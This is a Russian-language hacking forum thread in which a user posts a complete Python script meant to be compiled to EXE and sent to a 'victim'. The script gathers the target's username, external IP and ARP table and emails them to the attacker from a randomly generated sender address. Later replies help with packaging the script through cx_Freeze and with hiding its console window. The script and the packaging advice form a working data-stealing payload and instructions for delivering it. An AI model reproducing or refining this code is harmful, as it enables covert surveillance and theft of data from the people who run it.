[Python] Скрипт для сбора данных о цели

C

cerberus

Написал скрипт, но вот только начинаю думать для чего, если его не возможно нормально конвертировать в EXE и отправить жертве. Ну, решил выложить скрипт для всеобщего обозрения.
Скрипт собирает такие данные как: Имя пользователя, внешний IP-адрес, ARP-таблицу и отправляет их к вам на почту. Думаю, что дополнить данный скрипт не составит проблем, только вот зачем.

Python:
import http.client
import random
import smtplib
import os
from time import gmtime, strftime
from email.mime.text import MIMEText

# Генератор почты
def genemail():

lang = ['a','b','c','d','e','f','g','h','i','j','k','l',
    'm','n','o','p','q','r','s','t','u','v','w','x','y','z']
    value = len(lang)
    email = ''
    text = 0

while text <= 10:
        ran = random.randint(0, value-1)
        email = email + str(lang[ran])
        text += 1

return email + '@gmail.com'

# Получение внешнего IP-адресса
def externalip():
    conn = http.client.HTTPConnection("ifconfig.me")
    conn.request("GET", "/ip")
    ip = conn.getresponse().read()
    return ip

# Сбор данных IPCONFIG
def ipconfig():
    os.popen('chcp 65001')
    info = os.popen('arp -a').read()
    pc = os.popen('set USERNAME').read().replace('USERNAME=','')
    os.popen('chcp 1251')
    data = strftime("%Y-%m-%d %H:%M:%S", gmtime())
    return info, data, pc

ifinfo, data, pc = ipconfig()
ip = externalip().decode('utf-8')
email = genemail()

# Отправка почты
msg = MIMEText('[+] Имя пользователя: '+pc+'[+] Дата отправки: '+data+'\n[+] Внешний IP-адресс: '+ip+'\n[+] ARP Таблица:\n'+ifinfo)
me = email
you = 'ТУТ ВАША ПОЧТА(В КАВЫЧКАХ)'
msg['Subject'] = 'Information from %s' % pc + ' [' + data + ']'
msg['From'] = me
msg['To'] = you
smtpnumber = random.randint(1,4)
s = smtplib.SMTP('alt'+ str(smtpnumber) +'.gmail-smtp-in.l.google.com', 25)
s.sendmail(me, [you], msg.as_string())
s.quit()

Последнее редактирование:
C

cerberus

Ну как это невозможно? Есть способы и даже несколько python to EXE
Пробовал, вылазит ошибка о том что отсутствует DLL файл и что-то связанное с директорией. Допустим, что ошибки были исправлены, но вот что делать, если эти ошибки вылазят у жертвы. Данный скрипт должен работать безукоризненно, что со своей стороны я предоставил, а вот уже сам Python подводит.

explorer

Platinum
05.08.2018
1 080
2 475
BIT
0
но вот что делать, если эти ошибки вылазят у жертвы
У жертвы априори не может вылезти ни одной ошибки никогда, если проект собран в EXE. Рабочий EXE питона собирает абсолютно все зависимости необходимые для работы программы. У меня не всегда получалось собрать с первого раза, нужно немного поколдовать. Читайте трейс, вам правильно насчёт путей было написано, посмотрите в статье в последнем спойлере как это делается, про cx_Freeze , мне пришлось указывать полные пути к нужным dll, и тогда всё получилось.

C

cerberus

У жертвы априори не может вылезти ни одной ошибки никогда, если проект собран в EXE. Рабочий EXE питона собирает абсолютно все зависимости необходимые для работы программы. У меня не всегда получалось собрать с первого раза, нужно немного поколдовать. Читайте трейс, вам правильно насчёт путей было написано, посмотрите в статье в последнем спойлере как это делается, про cx_Freeze , мне пришлось указывать полные пути к нужным dll, и тогда всё получилось.
Так-с. Камень двинулся с места. С cx_Freeze всё получилось. Попробую сделать файл более компактным.

При конвертации py файла в exe с аргументом --noconsole программа не работает, а если убрать аргумент, то все будет работать отлично.
В чем может быть проблема?
Возникает ошибка при конвертации py файла в exe с параметром --noconsole.

27429

Буду рад любому совету и любой помощи.
Отмечу сразу, что информацию по поводу ошибки в Google я искал, но безуспешно.

Последнее редактирование модератором:

Your 2B wify

Green Team
01.06.2018
96
21
BIT
0
Если работаешь с Tkinter и cx_Freeze нужно ручками кидать дллки в папку + прописывать путь до папок с либами

Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!